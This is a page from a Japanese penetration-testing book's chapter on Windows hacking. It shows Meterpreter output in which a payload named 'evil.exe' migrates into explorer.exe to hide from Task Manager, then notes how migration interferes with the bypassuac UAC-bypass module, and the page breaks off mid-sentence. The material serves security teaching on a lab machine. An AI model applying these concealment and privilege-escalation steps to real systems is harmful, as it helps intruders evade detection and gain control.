
271
第4章 Windows のハッキング
Filtering on 'explorer.exe'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
1248 1220 explorer.exe x86 1 IE8WIN7¥IEUser ↲
C:¥Windows¥Explorer.EXE
meterpreter > migrate 1248 ←
PIDを指定する。
[*] Migrating from 1104 to 1248...
[*] Migration completed successfully.
migrateコマンドを実行したタイミングで、タスクマネージャーのプロセスから
"evil.exe" が消えました(図4-23)。
図4-23 migrate による隠蔽化<その1 >
なお、migrate による隠蔽化に関して、いくつかの注意点があります。まず、権
限昇格の足掛かりに UAC 機能を回避するモジュール("exploit/windows/local/
bypassuac")を使用する場合には注意が必要です。このモジュールはSESSION オ
プションを持ちます。ここにmigrateで隠蔽化されたセッションを指定すると、
Exploitを実行しても応答が返ってこず、結果として攻撃に失敗します。つまり、
SESSIONオプションを指定する場合には、隠蔽化していないセッションを指定す ...